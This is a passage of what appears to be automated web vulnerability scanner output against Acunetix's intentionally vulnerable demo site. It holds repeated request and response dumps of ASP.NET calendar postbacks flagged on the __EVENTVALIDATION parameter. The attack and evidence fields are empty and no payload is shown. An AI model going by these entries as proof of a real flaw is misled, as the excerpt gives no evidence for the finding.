to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8218&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgDAoc69W9oIZGRkowLyOxWpwKo0jk95pY38xG9VqlM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLO1v3eAgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2FfNlUcu7eWaikBJfb13fyE0Bfovg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:55:24 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgDAoc69W9oIZGRkowLyOxWpwKo0jk95pY38xG9VqlM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLO1v3eAgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/fNlUcu7eWaikBJfb13fyE0Bfovg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:White" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1183 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,183 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8281&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgAAqD4%2FjdoIZGRkFAY0IZJxt%2F3xWgCDg8oECh2baUA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLo4ZrvAwLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAlyAr5wSLIKWazuZK43D01nsA2pV
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:55:05 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgAAqD4/jdoIZGRkFAY0IZJxt/3xWgCDg8oECh2baUA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLo4ZrvAwLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAlyAr5wSLIKWazuZK43D01nsA2pV" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:White" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for 